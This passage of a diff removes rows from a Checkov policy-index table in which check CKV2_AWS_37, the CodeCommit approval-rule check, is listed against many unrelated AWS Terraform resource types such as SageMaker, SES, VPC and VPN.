-| 1331 | CKV2_AWS_37              | resource                         | aws_sagemaker_endpoint                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1332 | CKV2_AWS_37              | resource                         | aws_sagemaker_endpoint_configuration                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1333 | CKV2_AWS_37              | resource                         | aws_sagemaker_model                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1334 | CKV2_AWS_37              | resource                         | aws_sagemaker_notebook_instance                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1335 | CKV2_AWS_37              | resource                         | aws_sagemaker_notebook_instance_lifecycle_configuration                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1336 | CKV2_AWS_37              | resource                         | aws_secretsmanager_secret                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1337 | CKV2_AWS_37              | resource                         | aws_secretsmanager_secret_rotation                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1338 | CKV2_AWS_37              | resource                         | aws_secretsmanager_secret_version                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1339 | CKV2_AWS_37              | resource                         | aws_security_group                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1340 | CKV2_AWS_37              | resource                         | aws_security_group_rule                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1341 | CKV2_AWS_37              | resource                         | aws_securityhub_account                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1342 | CKV2_AWS_37              | resource                         | aws_securityhub_member                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1343 | CKV2_AWS_37              | resource                         | aws_securityhub_product_subscription                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1344 | CKV2_AWS_37              | resource                         | aws_securityhub_standards_subscription                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1345 | CKV2_AWS_37              | resource                         | aws_service_discovery_http_namespace                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1346 | CKV2_AWS_37              | resource                         | aws_service_discovery_private_dns_namespace                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1347 | CKV2_AWS_37              | resource                         | aws_service_discovery_public_dns_namespace                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1348 | CKV2_AWS_37              | resource                         | aws_service_discovery_service                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1349 | CKV2_AWS_37              | resource                         | aws_servicecatalog_portfolio                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1350 | CKV2_AWS_37              | resource                         | aws_servicequotas_service_quota                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1351 | CKV2_AWS_37              | resource                         | aws_ses_active_receipt_rule_set                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1352 | CKV2_AWS_37              | resource                         | aws_ses_configuration_set                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1353 | CKV2_AWS_37              | resource                         | aws_ses_domain_dkim                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1354 | CKV2_AWS_37              | resource                         | aws_ses_domain_identity                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1355 | CKV2_AWS_37              | resource                         | aws_ses_domain_identity_verification                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1356 | CKV2_AWS_37              | resource                         | aws_ses_domain_mail_from                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1357 | CKV2_AWS_37              | resource                         | aws_ses_email_identity                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1358 | CKV2_AWS_37              | resource                         | aws_ses_event_destination                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1359 | CKV2_AWS_37              | resource                         | aws_ses_identity_notification_topic                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1360 | CKV2_AWS_37              | resource                         | aws_ses_identity_policy                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1361 | CKV2_AWS_37              | resource                         | aws_ses_receipt_filter                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1362 | CKV2_AWS_37              | resource                         | aws_ses_receipt_rule                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1363 | CKV2_AWS_37              | resource                         | aws_ses_receipt_rule_set                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1364 | CKV2_AWS_37              | resource                         | aws_ses_template                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1365 | CKV2_AWS_37              | resource                         | aws_sfn_activity                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1366 | CKV2_AWS_37              | resource                         | aws_sfn_state_machine                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1367 | CKV2_AWS_37              | resource                         | aws_shield_protection                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1368 | CKV2_AWS_37              | resource                         | aws_simpledb_domain                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1369 | CKV2_AWS_37              | resource                         | aws_snapshot_create_volume_permission                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1370 | CKV2_AWS_37              | resource                         | aws_sns_platform_application                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1371 | CKV2_AWS_37              | resource                         | aws_sns_sms_preferences                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1372 | CKV2_AWS_37              | resource                         | aws_sns_topic                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1373 | CKV2_AWS_37              | resource                         | aws_sns_topic_policy                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1374 | CKV2_AWS_37              | resource                         | aws_sns_topic_subscription                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1375 | CKV2_AWS_37              | resource                         | aws_spot_datafeed_subscription                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1376 | CKV2_AWS_37              | resource                         | aws_spot_fleet_request                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1377 | CKV2_AWS_37              | resource                         | aws_spot_instance_request                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1378 | CKV2_AWS_37              | resource                         | aws_sqs_queue                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1379 | CKV2_AWS_37              | resource                         | aws_sqs_queue_policy                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1380 | CKV2_AWS_37              | resource                         | aws_ssm_activation                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1381 | CKV2_AWS_37              | resource                         | aws_ssm_association                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1382 | CKV2_AWS_37              | resource                         | aws_ssm_document                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1383 | CKV2_AWS_37              | resource                         | aws_ssm_maintenance_window                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1384 | CKV2_AWS_37              | resource                         | aws_ssm_maintenance_window_target                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1385 | CKV2_AWS_37              | resource                         | aws_ssm_maintenance_window_task                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1386 | CKV2_AWS_37              | resource                         | aws_ssm_parameter                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1387 | CKV2_AWS_37              | resource                         | aws_ssm_patch_baseline                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1388 | CKV2_AWS_37              | resource                         | aws_ssm_patch_group                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1389 | CKV2_AWS_37              | resource                         | aws_ssm_resource_data_sync                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1390 | CKV2_AWS_37              | resource                         | aws_storagegateway_cache                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1391 | CKV2_AWS_37              | resource                         | aws_storagegateway_cached_iscsi_volume                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1392 | CKV2_AWS_37              | resource                         | aws_storagegateway_gateway                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1393 | CKV2_AWS_37              | resource                         | aws_storagegateway_nfs_file_share                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1394 | CKV2_AWS_37              | resource                         | aws_storagegateway_smb_file_share                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1395 | CKV2_AWS_37              | resource                         | aws_storagegateway_upload_buffer                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1396 | CKV2_AWS_37              | resource                         | aws_storagegateway_working_storage                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1397 | CKV2_AWS_37              | resource                         | aws_subnet                                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1398 | CKV2_AWS_37              | resource                         | aws_swf_domain                                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1399 | CKV2_AWS_37              | resource                         | aws_transfer_server                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1400 | CKV2_AWS_37              | resource                         | aws_transfer_ssh_key                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1401 | CKV2_AWS_37              | resource                         | aws_transfer_user                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1402 | CKV2_AWS_37              | resource                         | aws_volume_attachment                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1403 | CKV2_AWS_37              | resource                         | aws_vpc                                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1404 | CKV2_AWS_37              | resource                         | aws_vpc_dhcp_options                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1405 | CKV2_AWS_37              | resource                         | aws_vpc_dhcp_options_association                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1406 | CKV2_AWS_37              | resource                         | aws_vpc_endpoint                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1407 | CKV2_AWS_37              | resource                         | aws_vpc_endpoint_connection_notification                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1408 | CKV2_AWS_37              | resource                         | aws_vpc_endpoint_route_table_association                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1409 | CKV2_AWS_37              | resource                         | aws_vpc_endpoint_service                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1410 | CKV2_AWS_37              | resource                         | aws_vpc_endpoint_service_allowed_principal                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1411 | CKV2_AWS_37              | resource                         | aws_vpc_endpoint_subnet_association                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1412 | CKV2_AWS_37              | resource                         | aws_vpc_ipv4_cidr_block_association                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1413 | CKV2_AWS_37              | resource                         | aws_vpc_peering_connection                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1414 | CKV2_AWS_37              | resource                         | aws_vpc_peering_connection_accepter                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1415 | CKV2_AWS_37              | resource                         | aws_vpc_peering_connection_options                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1416 | CKV2_AWS_37              | resource                         | aws_vpn_connection                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1417 | CKV2_AWS_37              | resource                         | aws_vpn_connection_route                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1418 | CKV2_AWS_37              | resource                         | aws_vpn_gateway                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1419 | CKV2_AWS_37              | resource                         | aws_vpn_gateway_attachment                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1420 | CKV2_AWS_37              | resource                         | aws_vpn_gateway_route_propagation                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
